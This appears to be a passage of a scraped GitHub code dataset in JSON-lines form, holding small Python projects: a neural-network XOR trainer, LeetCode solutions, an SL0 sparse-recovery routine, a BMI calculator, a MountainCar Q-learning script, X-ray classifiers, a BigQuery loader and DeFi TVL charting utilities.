win.close()\nmain()\n","repo_name":"dereky1/schoolcoursework","sub_path":"EECS12/hw6.py","file_name":"hw6.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30621747426","text":"import numpy as np\r\n\r\ndef binary (x):\r\n    if x > 0:\r\n        return 1\r\n    else:\r\n        # treat 0 (and negatives) as class 0 so the function always returns a label\r\n        return 0\r\n    \r\ndef sigmoid (x):\r\n    return 1 / (1 + np.exp(-x))\r\n\r\ndef sigmoid_derivative (x):\r\n    return np.exp(-x) / (1 + np.exp(-x)) ** 2\r\n\r\npattern = [[0,0], [0,1], [1,0], [1,1]]\r\nx = np.asarray(pattern)\r\ny = [0, 1, 1, 0]\r\n# random weights \r\nrand1 = np.random.randint(0, 10, (1, 6))\r\nrand2 = np.random.randint(-10, 0, (1, 2))\r\nw00 = rand1[0][0]\r\nw01 = rand1[0][1]\r\nw02 = rand1[0][2]\r\nw03 = rand1[0][3]\r\nw04 = rand1[0][4]\r\nw05 = rand1[0][5]\r\nw11 = rand2[0][0]\r\nw12 = rand2[0][1]\r\n\r\nerror = np.zeros(len(x))\r\nlearning_rate = 0.01\r\n# modify the weights until error == 0\r\nwhile True:\r\n    for i in range(len(x)):\r\n        x1, x2 = x[i][0], x[i][1]\r\n        y_true = y[i]\r\n        s1 = w00 + x1 * w02 + x2 * w04\r\n        a1 = sigmoid(s1)\r\n        s2 = w01 + x1 * w03 + x2 * w05\r\n        a2 = sigmoid(s2)\r\n        s3 = a1 * w11 + a2 * w12\r\n        y_act = binary(s3)\r\n        error[i] = y_true - y_act \r\n        # modifying the weights (an error of 0 simply leaves them unchanged) \r\n        w11 += learning_rate * error[i] * a1\r\n        w12 += learning_rate * error[i] * a2  \r\n        w00 += learning_rate * (w11 * error[i]) * sigmoid_derivative(s1) * 1\r\n        w01 += learning_rate * (w12 * error[i]) * sigmoid_derivative(s2) * 1\r\n        w02 += learning_rate * (w11 * error[i]) * sigmoid_derivative(s1) * x1\r\n        w03 += learning_rate * (w12 * error[i]) * sigmoid_derivative(s2) * x1\r\n        w04 += learning_rate * (w11 * error[i]) * sigmoid_derivative(s1) * x2\r\n        w05 += learning_rate * (w12 * error[i]) * sigmoid_derivative(s2) * x2\r\n        if np.all((error == 0)): \r\n            print(\"w00:\", w00)\r\n            print(\"w01:\", w01)\r\n            print(\"w02:\", w02)\r\n            print(\"w03:\", w03)\r\n            print(\"w04:\", w04)\r\n            print(\"w05:\", w05)\r\n            print(\"-----------------------\")\r\n            print(\"w11:\", w11)\r\n            print(\"w12:\", w12)    \r\n            break  \r\n
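\r\n# Sanity check (illustrative; uses the same forward pass as the training loop):\r\n# evaluate the trained network on all four XOR patterns with the final weights.\r\nfor i in range(len(x)):\r\n    a1 = sigmoid(w00 + x[i][0] * w02 + x[i][1] * w04)\r\n    a2 = sigmoid(w01 + x[i][0] * w03 + x[i][1] * w05)\r\n    print(x[i], \"->\", binary(a1 * w11 + a2 * w12))\r\n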
","repo_name":"hmadinei/xor_perceptron_learning","sub_path":"XOR.py","file_name":"XOR.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30807169045","text":"from typing import List\n\nclass Solution:\n    def jump(self, nums: List[int]) -> int:\n        if len(nums) < 2:\n            return 0\n        maxRange = nums[0]\n        index = 0\n        cnt = 1\n        while maxRange < len(nums) - 1:\n            for i in range(index, maxRange+1):\n                if nums[i] + i > maxRange:\n                    maxRange = nums[i] + i\n                    index = i\n            cnt += 1\n        return cnt\n    ","repo_name":"qinhanhu/leetcode","sub_path":"l45_jump_game2.py","file_name":"l45_jump_game2.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31472796173","text":"\"\"\"Implementation of the Smoothed L0 Optimisation algorithm developed by Mohimani et al, see http://ee.sharif.edu/~SLzero/ for details.\"\"\"\r\n\r\nimport numpy as np\r\nfrom math import exp\r\n\r\ndef gaussian_F(x_i, sigma):\r\n    \"\"\"Calculate the maximisation function f_{sigma} for an element of the vector x\"\"\"\r\n    x = np.abs(x_i)\r\n    return x_i * exp(-1*x*x/(2*sigma*sigma))\r\n\r\nFsigma_gauss = np.vectorize(gaussian_F, otypes=[np.complex_]) #Vectorize the gaussian function\r\n#Fsigma_gauss = np.vectorize(gaussian_F, otypes=[np.float64]) #Vectorize the gaussian function\r\n\r\ndef SL0(A, b, sigma_min, **kwargs):\r\n    \"\"\"Function that performs the SL0 algorithm given the matrix A and b, and a minimum value of sigma.\r\n    Arguments: \r\n    - A: numpy matrix\r\n    - b: numpy matrix\r\n    - sigma_min: Float, minimum value of the approximation parameter sigma. A sensible default is 1e-12\r\n    Optional keyword arguments:\r\n    - Fsigma: vectorized function that takes an element of a vector, and the parameter sigma, as arguments. Defaults to\r\n      the Gaussian form used by the authors\r\n    - L: Number of steps of the gradient ascent step, defaults to 3\r\n    - mu_0: Gradient in the gradient ascent step, defaults to 2\r\n    - sigma_decrease: Factor by which the approximation parameter sigma is multiplied each step\r\n    \"\"\"\r\n    #Defaults for mu_0, L, decrease factor taken from the paper\r\n    Fsigma = kwargs.pop('Fsigma', Fsigma_gauss)\r\n    mu_0 = kwargs.pop('mu_0', 2)\r\n    L = kwargs.pop('L', 3)\r\n    sdf = kwargs.pop('sigma_decrease',0.5)\r\n    A_plus = np.linalg.pinv(A)\r\n    x = np.dot(A_plus,b)\r\n    sigma = 2*np.max(np.abs(x))\r\n    while sigma > sigma_min:\r\n        for i in range(L): #Do L rounds of gradient ascent\r\n            delta = Fsigma(x, sigma)\r\n            x -= mu_0*delta\r\n            x -= np.dot(A_plus , (np.dot(A,x)-b))\r\n        sigma *= sdf #Sigma decrease factor value chosen by the authors\r\n    return np.around(x, decimals=10)  \r\n
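\r\n# Illustrative usage sketch (the dimensions, sparsity pattern and seed here are\r\n# arbitrary choices, not from the paper): recover a sparse vector x from an\r\n# underdetermined system A x = b. A is cast to complex because the default\r\n# Fsigma_gauss above is vectorized with complex output.\r\nif __name__ == '__main__':\r\n    np.random.seed(0)\r\n    A = np.random.randn(20, 50).astype(complex)\r\n    x_true = np.zeros(50, dtype=complex)\r\n    x_true[[3, 17, 41]] = [1.5, -2.0, 0.7]\r\n    b = np.dot(A, x_true)\r\n    x_hat = SL0(A, b, 1e-12)\r\n    print(\"recovered support:\", np.flatnonzero(np.abs(x_hat) > 1e-3))\r\n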
","repo_name":"perepichka/ceha","sub_path":"ceha/SL02.py","file_name":"SL02.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"22817675367","text":"# 019 BMI calculator\n# Write a program that reads a person's height (in inches) and weight\n# (in pounds) from the user and computes their BMI.\n# BMI = (weight/(height * height))*703\n\n# Example\n# Your BMI is 19.5\n# You are within the ideal weight range.\n\n# Your BMI is 32.5\n# You are overweight. You should see your doctor.\n\nweight = int(input(\"Weight: \"))\nheight = int(input(\"Height: \"))\nbmi = weight / (height ** 2) * 703\n\nprint(\"Your BMI is %.1f\" % bmi)\n\nif bmi > 22.5:\n    print(\"You are overweight. You should see your doctor.\")\nelif bmi < 19:\n    print(\"You are underweight. You should see your doctor.\")\nelse:\n    print(\"You are within the ideal weight range.\")\n\n","repo_name":"BackToTheSchool/assignment_hw","sub_path":"171107_Python/019.py","file_name":"019.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8518286425","text":"from typing import List\nfrom collections import defaultdict\n\nclass Solution:\n    def findSubarrays(self, nums: List[int]) -> bool:\n        n = len(nums)\n        d = defaultdict(int)\n        for i in range(n-1):\n            if nums[i] + nums[i+1] in d:\n                return True\n            else:\n                d[nums[i] + nums[i+1]] += 1\n        return False","repo_name":"gurjotsc/gcheema-cp","sub_path":"leetcode/easy/findSubarraysWithEqualSum.py","file_name":"findSubarraysWithEqualSum.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7907699570","text":"\nimport gym\nimport numpy as np\nfrom sklearn.pipeline import FeatureUnion\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.kernel_approximation import RBFSampler\nfrom sklearn.linear_model import SGDRegressor\n\nenv = gym.make('MountainCar-v0')\n\nclass SGDRegressor:\n    def __init__(self, **kwargs):\n        self.w = None\n        self.lr = 1e-2\n\n    def partial_fit(self, X, Y):\n        if self.w is None:\n            D = X.shape[1]\n            self.w = np.random.randn(D) / np.sqrt(D)\n        self.w += self.lr*(Y - X.dot(self.w)).dot(X)\n\n    def predict(self, X):\n        return X.dot(self.w)\n\n\nclass FeatureTransformer:\n    def __init__(self, env, n_components=500):\n        # Sample 10000 random states from the observation space\n        observation_examples = np.array([env.observation_space.sample() for x in range(10000)])\n        scaler = StandardScaler()\n        scaler.fit(observation_examples)\n\n        # Used to convert a state to a featurized representation.\n        # We use RBF kernels with different variances to cover different parts of the space\n        featurizer = FeatureUnion([\n            (\"rbf1\", RBFSampler(gamma=5.0, n_components=n_components)),\n            (\"rbf2\", RBFSampler(gamma=2.0, n_components=n_components)),\n            (\"rbf3\", RBFSampler(gamma=1.0, n_components=n_components)),\n            (\"rbf4\", RBFSampler(gamma=0.5, n_components=n_components))\n        ])\n        example_features = featurizer.fit_transform(scaler.transform(observation_examples))\n\n        #print(example_features)\n\n        self.dimensions = example_features.shape[1]\n        self.scaler = scaler\n        self.featurizer = featurizer\n
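\n    # The Model class below calls feature_transformer.transform(), but the method\n    # is missing here; this is a minimal sketch of the presumably intended one:\n    def transform(self, observations):\n        scaled = self.scaler.transform(observations)\n        return self.featurizer.transform(scaled)\n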
\nclass Model:\n    def __init__(self, env, feature_transformer, learning_rate):\n        self.env = env\n        self.models = []\n        self.feature_transformer = feature_transformer\n        for i in range(env.action_space.n):\n            model = SGDRegressor(learning_rate=learning_rate)\n            model.partial_fit(feature_transformer.transform( [env.reset()] ), [0])\n            self.models.append(model)\n\n    def predict(self, s):\n        X = self.feature_transformer.transform([s])\n        result = np.stack([m.predict(X) for m in self.models]).T\n        assert(len(result.shape) == 2)\n        return result\n\n    def update(self, s, a, G):\n        X = self.feature_transformer.transform([s])\n        assert(len(X.shape) == 2)\n        self.models[a].partial_fit(X, [G])\n\n    def sample_action(self, s, eps):\n        # eps = 0\n        # Technically, we don't need to do epsilon-greedy\n        # because SGDRegressor predicts 0 for all states\n        # until they are updated. This works as the\n        # \"Optimistic Initial Values\" method, since all\n        # the rewards for Mountain Car are -1.\n        if np.random.random() < eps:\n            return self.env.action_space.sample()\n        else:\n            return np.argmax(self.predict(s))\n\ndef play_one(model,eps,gamma,n=5):\n\n    observation = env.reset()\n    done = False\n    totalReward = 0\n    rewards = []\n    states = []\n    actions = []\n    iters = 0\n\n    # This array stores the discount factors\n    # [ Gamma^0, Gamma^1, (...), Gamma^T-1]\n    multiplier = np.array([gamma]*n)**np.arange(n)\n    \n    while not done and iters < 10000:\n\n        # Epsilon Greedy\n        action = model.sample_action(observation,eps)\n\n        # Store Action and State\n        states.append(observation)\n        actions.append(action)\n\n        # Execute Action\n        prev_observation = observation\n        observation, reward, done, info = env.step(action)\n\n        # Store Reward\n        rewards.append(reward)\n\n        # Update Model\n        # To Update The Model We need at least N rewards\n        if len(rewards) >= n:\n            \n            # Return up to prediction\n            # G = R(t+1)*Gamma^0 + R(t+2)*Gamma^1 + ... + R(t+T)*Gamma^T-1\n            # rewards[-n:] => the last n rewards\n            return_up_to_prediction = multiplier.dot(rewards[-n:])\n
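\n            # Sketch of the rest of the n-step update (an assumption about the\n            # intended logic, following the standard n-step Q-learning form):\n            # G = sum_k gamma^k R(t+k+1) + gamma^n * max_a Q(s', a), then update\n            # the estimate for the state visited n steps ago.\n            G = return_up_to_prediction + (gamma**n) * np.max(model.predict(observation)[0])\n            model.update(states[-n], actions[-n], G)\n\n        totalReward += reward\n        iters += 1\n\n    return totalReward\n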
\n\n#if __name__ == '__main__':\n\n    #env = gym.make('MountainCar-v0')\n    #ft = FeatureTransformer(env)\n","repo_name":"DinisSanchesFernandes/RL_StateOfTheArt","sub_path":"MountainCar/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14979061095","text":"from keras.models import load_model\nimport tensorflow as tf\nfrom numpy import array\nimport torch\n\n\ndef load_img(fetch_dir):\n    img = tf.keras.preprocessing.image.load_img(fetch_dir,target_size=(128,128))\n    input_arr = tf.keras.preprocessing.image.img_to_array(img)/255\n    input_arr = array([input_arr]) \n    return input_arr\n    \ndef bietapic_1(fetch_dir): \n    img = load_img(fetch_dir)\n    model = load_model('Filtro_Bietapico_Primero.h5')\n    y = model.predict(img,workers=8)\n    biet_1_dict = {0: 'Chest', 1: 'Other'}\n    preds = y.argmax(axis=-1)\n    preds_c = [biet_1_dict[p] for p in preds]\n    return y[0][0],preds_c[0]\n\ndef bietapic_2(fetch_dir):\n    img = load_img(fetch_dir)\n    model = load_model('Filtro_Bietapico_Segundo.h5')\n    y = model.predict(img,workers=8)\n    biet_1_dict = {0: 'AP_horizontal', 1: 'L', 2: 'PA'}\n    preds = y.argmax(axis=-1)\n    preds_c = [biet_1_dict[p] for p in preds]\n    return y[0],preds_c[0]\n\ndef opacity_detector(fetch_dir):\n    img = load_img(fetch_dir)\n    img = tf.keras.preprocessing.image.array_to_img(img[0])\n    model = torch.hub.load('ultralytics/yolov5','custom',path='corrida_3.pt')\n    results = model(img)\n    print(results.pandas().xyxy[0])\n    return results.pandas().xyxy[0]\n\n","repo_name":"euberrino/ssd-chest-xray","sub_path":"03. Complete model/classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25278551928","text":"import geopandas as gpd\nimport pandas_gbq as gbq\n\nproject_id = \"serenity-gbq\"\ntable_id = \"demo\"\n\ndef ingest_shapefile_bigquery(**kwargs):\n    geo_df = gpd.read_file(\"Vancouver-shp/shape/buildings.shp\")\n    dataset_id = \"waterways\"\n    print(geo_df)\n    gbq.to_gbq(dataframe=geo_df,\n        destination_table=dataset_id +\".\" +table_id,\n        project_id=project_id,\n        if_exists=\"replace\",\n        # table_schema=specify_schema_object\n        )\n\ningest_shapefile_bigquery()\n","repo_name":"jonhealy1/serenity-gbq","sub_path":"examples/pandas_gbq/geopandas-gbq.py","file_name":"geopandas-gbq.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34631598619","text":"# -*- coding: utf8 -*- \r\n\r\n#--------------------------------SMART-STEP REPORTES------------------------------------------------\r\nimport os\r\nimport fnmatch\r\nimport datetime\r\n\r\nimport dates\r\nimport xlrd\r\nimport excel_helper\r\nimport excel_utils\r\n\r\nimport utils\r\nimport elements\r\n \r\nclass ExcelRecord(object):\r\n    def __init__(self, record): \r\n        self.uncalculated = False\r\n        \r\n        for k, cell in record.items(): \r\n            setattr(self, k, cell) \r\n        \r\n        #build monthly payment - relevant when monthly payment changes within the year\r\n        self.monthlyColumns = sorted([int(k.split('_')[1]) for k in self.__dict__ if 'תשלום חודשי_' in k])\r\n        \r\n        \r\n    @property\r\n    def skip(self): \r\n        return self.appartment == '*'\r\n    \r\n    @property\r\n    def eof(self): \r\n        return self.appartment == '' \r\n    \r\n    \r\n    def monthlyData(self, year, excelCellInfoPerDate = None):\r\n        \r\n        \r\n        #find columns in this sheet which represent months\r\n        allMonths = sorted([k for k in self.__dict__ if dates.datify(k, year)], key= (lambda dateColumn: dates.datify(dateColumn))) \r\n        \r\n        #build monthly expected payments table\r\n        monthlyExpectedPaymentOf = {} \r\n        \r\n        #if there are different expected payments throughout this sheet, then monthlyColumns gets updated\r\n        #at the c'tor of the excel record\r\n        if len(self.monthlyColumns):\r\n            currExpectedPayment = self.payment\r\n            for m in allMonths:\r\n                if m in self.monthlyColumns:\r\n                    currExpectedPayment = int(getattr(self, 'תשלום חודשי_%d' % m))\r\n                monthlyExpectedPaymentOf[m] = currExpectedPayment \r\n        else:\r\n            for m in allMonths:\r\n                monthlyExpectedPaymentOf[m] = utils.Intify(self.payment)\r\n        \r\n        #calculate how much was paid during the whole period\r\n        total_paid = sum( utils.Intify(self.monthlyPayment(month))\r\n                          for month in allMonths \r\n                          if self.monthlyPayment(month) is not None) \r\n\r\n        for month in allMonths: \r\n            \r\n            cell_info = excelCellInfoPerDate[dates.datify(month, year)]\r\n            \r\n            expected_payment = monthlyExpectedPaymentOf[month]\r\n            \r\n            if not total_paid:\r\n                actual_payment = 0\r\n                \r\n            else:\r\n                if total_paid >= expected_payment:\r\n                    actual_payment = expected_payment\r\n                    \r\n                else:\r\n                    actual_payment = total_paid\r\n                \r\n                total_paid -= actual_payment \r\n            \r\n            cell_info.payment_details.actual_payment = actual_payment\r\n            cell_info.payment_details.expected_payment = expected_payment \r\n            \r\n        \r\n    def monthlyPayment(self, month):\r\n        return excel_utils.ExtractCellValueByColumn(self, str(month))\r\n        \r\n        \r\n        \r\n    @property\r\n    def payment(self):\r\n        #if payment does not 
exist, treat as 0 as it is defined integer in the data base\r\n return utils.Intify(excel_utils.ExtractCellValueByColumn(self, 'תשלום חודשי'))\r\n \r\n \r\n #payment = getattr(self, 'תשלום חודשי', '').decode('utf-8')\r\n \r\n ##payment can also be empty or text (indicating this is not debt) hence it is not always an integer\r\n #try:\r\n #return int(payment)\r\n #except ValueError: \r\n #return payment\r\n\r\n @property\r\n def appartment(self):\r\n app = excel_utils.ExtractCellValueByColumn(self, 'דירה')\r\n try:\r\n return int(app)\r\n except: \r\n return app.strip()\r\n \r\n @property\r\n def owner(self): \r\n return excel_utils.ExtractCellValueByColumn(self, 'שם בעלים')\r\n #return getattr(self, 'שם בעלים', '').decode('utf-8')\r\n \r\n @property\r\n def tenant(self):\r\n return excel_utils.ExtractCellValueByColumn(self, 'שם דיירים') \r\n #return getattr(self, 'שם דיירים', '').decode('utf-8')\r\n \r\n @property\r\n def ownerMails(self):\r\n return excel_utils.ExtractCellValueByColumn(self, 'מייל בעלים').split()\r\n #return getattr(self, 'מייל בעלים', '').decode('utf-8').split()\r\n \r\n @property\r\n def tenantMails(self):\r\n return excel_utils.ExtractCellValueByColumn(self, 'מייל דיירים').split()\r\n #return getattr(self, 'מייל דיירים', '').decode('utf-8').split()\r\n \r\n @property\r\n def ownerPhones(self): \r\n return excel_utils.ExtractCellValueByColumn(self, 'טלפון בעלים').split()\r\n #return getattr(self, 'טלפון בעלים', '').decode('utf-8').split()\r\n \r\n @property\r\n def tenantPhones(self): \r\n return excel_utils.ExtractCellValueByColumn(self, 'טלפון דיירים').split()\r\n #return getattr(self, 'טלפון דיירים', '').decode('utf-8').split()\r\n \r\n @property\r\n def isRepresentative(self): \r\n return False \r\n\r\ndef SupportedExcelExtentions():\r\n #smart step only uses xls suffix as this is the only supported type by xlrd that can \r\n #read the cell colors\r\n return ['.xls']\r\n\r\ndef GetGeneralSheet(excel_book):\r\n sheetsOf = {} \r\n sheets = excel_book.sheet_names()\r\n #scan and find interesting sheets\r\n for sheet_name in sheets: \r\n if utils.config.excelGeneralSheetPrefix in sheet_name:\r\n sheet = excel_book.sheet_by_name(sheet_name)\r\n try:\r\n #if after removing prefix, there are a few digits left besides numbers, then don't take \r\n #this sheet into account\r\n year = int(sheet_name.replace(utils.config.excelGeneralSheetPrefix, '').strip())\r\n except:\r\n continue\r\n \r\n \r\n \r\n #don't take future years into account\r\n if year <= datetime.date.today().year:\r\n sheetsOf[year] = sheet\r\n \r\n #build tenants personal details, based on the newest year\r\n return sheetsOf[max(sheetsOf)] if len(sheetsOf) else None\r\n \r\n \r\ndef GetPaymentSheets(excel_book):\r\n sheetsOf = {}\r\n sheets = excel_book.sheet_names()\r\n #scan and find interesting sheets\r\n for sheet_name in sheets:\r\n \r\n if utils.config.excelPaymentSheetPrefix in sheet_name:\r\n sheet = excel_book.sheet_by_name(sheet_name)\r\n \r\n try:\r\n #if after removing prefix, there are a few digits left besides numbers, then don't take \r\n #this sheet into account\r\n year = int(sheet_name.replace(utils.config.excelPaymentSheetPrefix, '').strip())\r\n except:\r\n continue \r\n \r\n #don't take future years into account\r\n if year <= datetime.date.today().year:\r\n sheetsOf[year] = sheet\r\n \r\n return sheetsOf if len(sheetsOf) else None\r\n \r\n \r\ndef GetTenant(excelRecord):\r\n if len(excelRecord.tenant):\r\n return elements.Person(excelRecord.tenant, excelRecord.tenantMails, 
excelRecord.tenantPhones)\r\n\r\ndef GetOwner(excelRecord):\r\n if len(excelRecord.owner):\r\n return elements.Person(excelRecord.owner, excelRecord.ownerMails, excelRecord.ownerPhones)\r\n \r\n \r\ndef ParseTenantsGeneralData(excel, buildingOf, dbBuildingName): \r\n \r\n book = excel_helper.OpenExcelFile(excel)\r\n if not book:\r\n return \r\n building_name = os.path.splitext(os.path.basename(excel).replace(utils.config.excelGeneralFilePrefix, '').strip())[0].strip() \r\n building = buildingOf[building_name]\r\n building.based_on_files.add(excel)\r\n building.building_name = building_name\r\n \r\n sheet = GetGeneralSheet(book)\r\n \r\n if not sheet:\r\n return \r\n \r\n #go over all excel rows, each represents an apartment\r\n for excelRecord in excel_helper.ExtractApartments(sheet, 2):\r\n \r\n apartment_number = excelRecord.appartment\r\n \r\n app = building.apartmentOf[apartment_number]\r\n \r\n app.apartment_number = apartment_number\r\n app.recent_payment = excelRecord.payment\r\n \r\n tenant = GetTenant(excelRecord) \r\n owner = GetOwner(excelRecord)\r\n \r\n if tenant or owner:\r\n #no owner, only tenant, so tenant is owner\r\n if not owner:\r\n app.owner = tenant\r\n app.owner.defacto = True\r\n else:\r\n #there is an owner\r\n app.owner = owner\r\n #if there is a tenant than he is the renter otherwise there is only an owner\r\n if tenant:\r\n app.renter = tenant\r\n app.renter.defacto = True\r\n else:\r\n app.owner.defacto = True\r\n \r\n #if no details for renter and owner store an empty person as owner\r\n else:\r\n app.owner = elements.Person()\r\n app.owner.defacto = True\r\n \r\n\r\ndef ParseTenantsPaymentData(excel, buildingOf, dbBuildingName):\r\n \r\n book = excel_helper.OpenExcelFile(excel)\r\n if not book:\r\n return\r\n building_name = os.path.splitext(os.path.basename(excel).replace(utils.config.excelPaymentFilePrefix, '').strip())[0].strip()\r\n \r\n building = buildingOf[building_name]\r\n building.based_on_files.add(excel)\r\n building.building_name = building_name \r\n\r\n #dict year->sheet\r\n sheetsOf = GetPaymentSheets(book)\r\n \r\n if not sheetsOf:\r\n return \r\n \r\n for (year, sheet) in sheetsOf.items(): \r\n #go over all excel rows, each represents an apartment\r\n for excelRecord in excel_helper.ExtractApartments(sheet, 2):\r\n \r\n apartment_number = excelRecord.appartment\r\n app = building.apartmentOf[apartment_number] \r\n excelRecord.monthlyData(year, app.excelCellInfoPerDate) \r\n \r\n\r\ndef ParseTenantSpecialsData(excel, buildingOf, dbBuildingName):\r\n return\r\n","repo_name":"omerbach/samm","sub_path":"customer_specific/smart-step/modules/customer_parser.py","file_name":"customer_parser.py","file_ext":"py","file_size_in_byte":10629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"15944381130","text":"\"\"\" Endpoints to proxy WikiData requests for info popups on the map \"\"\"\nfrom starlette.exceptions import HTTPException\nfrom starlette.responses import JSONResponse\nfrom data import get_wikidata, get_commons_thumbnail\nfrom util import cache_for\nfrom main import app\n\n\n@app.route(\"/wikidata/{wikidata_id}\")\n@cache_for(86400)\nasync def wikidata(request):\n wikidata_id = request.path_params['wikidata_id'].upper()\n\n response = {}\n data = await get_wikidata(wikidata_id)\n if data is None:\n raise HTTPException(404, \"Wikidata item not found\")\n\n response[\"sitelinks\"] = data[\"sitelinks\"]\n if (\n \"P18\" in data[\"claims\"]\n and 
data[\"claims\"][\"P18\"][0][\"mainsnak\"][\"datatype\"] == \"commonsMedia\"\n ):\n response[\"image\"] = data[\"claims\"][\"P18\"][0][\"mainsnak\"][\"datavalue\"][\"value\"]\n image_data = await get_commons_thumbnail(\n data[\"claims\"][\"P18\"][0][\"mainsnak\"][\"datavalue\"][\"value\"]\n )\n\n response[\"thumbnail\"] = image_data[\"imageinfo\"][0][\"thumburl\"]\n\n return JSONResponse(\n response,\n headers={\"Access-Control-Allow-Origin\": \"*\"},\n )\n","repo_name":"openinframap/openinframap","sub_path":"web-backend/wikidata.py","file_name":"wikidata.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"27"} +{"seq_id":"14439406829","text":"from __future__ import annotations\n\nimport toolstr\n\nimport ctc.config\nfrom ctc import cli\nfrom . import llama_requests\n\n\n#\n# # comparisons\n#\n\n\nasync def async_print_protocols_tvls(\n *,\n verbose: bool = False,\n n: int = 50,\n filter_category: str | None = None,\n filter_chain: str | None = None,\n) -> None:\n\n styles = cli.get_cli_styles()\n\n data = await llama_requests.async_get_protocols_tvls(\n category=filter_category,\n chain=filter_chain,\n )\n\n keys = [\n 'name',\n 'category',\n 'chain',\n 'tvl',\n ]\n\n if verbose:\n keys.append('slug')\n\n rows = []\n for datum in data[:n]:\n name = ' '.join(datum['name'].split(' ')[:2])\n row = [name, datum['category'], datum['chain'], datum['tvl']]\n if verbose:\n row.append(datum['slug'])\n rows.append(row)\n if n < len(data):\n rows.append(['...'] * len(keys))\n\n toolstr.print_text_box('TVL by Protocol', style=styles['title'])\n print()\n toolstr.print_table(\n rows,\n labels=keys,\n column_formats={\n 'tvl': {\n 'order_of_magnitude': True,\n 'decimals': 2,\n 'trailing_zeros': True,\n 'prefix': '$',\n },\n },\n border=styles['comment'],\n label_style=styles['title'],\n column_styles={\n 'tvl': styles['description'],\n },\n )\n\n\nasync def async_print_chains_tvls(n: int = 50) -> None:\n\n styles = cli.get_cli_styles()\n\n data = await llama_requests.async_get_chains_tvls()\n\n keys = [\n 'name',\n 'tvl',\n ]\n\n data = sorted(data, key=lambda datum: float(datum['tvl']), reverse=True)\n\n rows = []\n for datum in data[:n]:\n name = ' '.join(datum['name'].split(' ')[:2])\n row = [name, datum['tvl']]\n rows.append(row)\n\n if len(data) > n:\n rows.append(['...'] * len(keys))\n\n toolstr.print_text_box('TVL by Chain', style=styles['title'])\n print()\n toolstr.print_table(\n rows,\n labels=keys,\n column_formats={\n 'tvl': {\n 'order_of_magnitude': True,\n 'decimals': 2,\n 'trailing_zeros': True,\n 'prefix': '$',\n },\n },\n border=styles['comment'],\n label_style=styles['title'],\n column_styles={\n 'tvl': styles['description'],\n },\n )\n\n\n#\n# # historical charting\n#\n\n\nasync def async_print_historical_defi_tvl() -> None:\n\n styles = cli.get_cli_styles()\n\n data = await llama_requests.async_get_historical_defi_tvl()\n\n plot = toolstr.render_line_plot(\n xvals=data['timestamp'],\n yvals=data['tvl'],\n n_rows=10,\n n_columns=60,\n line_style=styles['description'],\n chrome_style=styles['comment'],\n tick_label_style=styles['metavar'],\n yaxis_kwargs={'tick_label_format': {'prefix': '$'}},\n char_dict=ctc.config.get_cli_chart_charset(),\n )\n\n toolstr.print_text_box('Historical Defi TVL', style=styles['title'])\n print()\n toolstr.print(plot)\n\n\nasync def async_print_historical_chain_tvl(chain: str) -> None:\n\n styles = cli.get_cli_styles()\n\n data = await 
llama_requests.async_get_historical_chain_tvl(chain)\n\n    plot = toolstr.render_line_plot(\n        xvals=data['timestamp'],\n        yvals=data['tvl'],\n        n_rows=10,\n        n_columns=60,\n        line_style=styles['description'],\n        chrome_style=styles['comment'],\n        tick_label_style=styles['metavar'],\n        yaxis_kwargs={'tick_label_format': {'prefix': '$'}},\n        char_dict=ctc.config.get_cli_chart_charset(),\n    )\n\n    toolstr.print_text_box(\n        'Historical ' + chain + ' TVL', style=styles['title']\n    )\n    print()\n    toolstr.print(plot, indent=4)\n\n\nasync def async_print_historical_protocol_tvl(\n    protocol: str, verbose: bool = False\n) -> None:\n\n    styles = cli.get_cli_styles()\n\n    uniswap = await llama_requests.async_get_historical_protocol_tvl(protocol)\n\n    timestamp = []\n    tvl = []\n    for datum in uniswap['tvl']:\n        timestamp.append(datum['date'])\n        tvl.append(datum['totalLiquidityUSD'])\n\n    plot = toolstr.render_line_plot(\n        xvals=timestamp,\n        yvals=tvl,\n        n_rows=10,\n        n_columns=60,\n        line_style=styles['description'],\n        chrome_style=styles['comment'],\n        tick_label_style=styles['metavar'],\n        yaxis_kwargs={'tick_label_format': {'prefix': '$'}},\n        char_dict=ctc.config.get_cli_chart_charset(),\n    )\n\n    toolstr.print_text_box(\n        'Historical ' + protocol + ' TVL', style=styles['title']\n    )\n    print()\n\n    if verbose:\n        toolstr.print(\n            toolstr.hjustify('All Chains', 'center', 70),\n            indent=4,\n            style=styles['title'],\n        )\n    toolstr.print(plot, indent=4)\n\n    if verbose:\n        chains = sorted(\n            uniswap['currentChainTvls'].keys(),\n            key=lambda chain: float(uniswap['currentChainTvls'][chain]),\n            reverse=True,\n        )\n\n        print()\n        for chain in chains:\n            raw_data = uniswap['chainTvls'][chain]['tvl']\n            timestamp = []\n            tvl = []\n            for datum in raw_data:\n                timestamp.append(datum['date'])\n                tvl.append(datum['totalLiquidityUSD'])\n\n            plot = toolstr.render_line_plot(\n                xvals=timestamp,\n                yvals=tvl,\n                n_rows=10,\n                n_columns=60,\n                line_style=styles['description'],\n                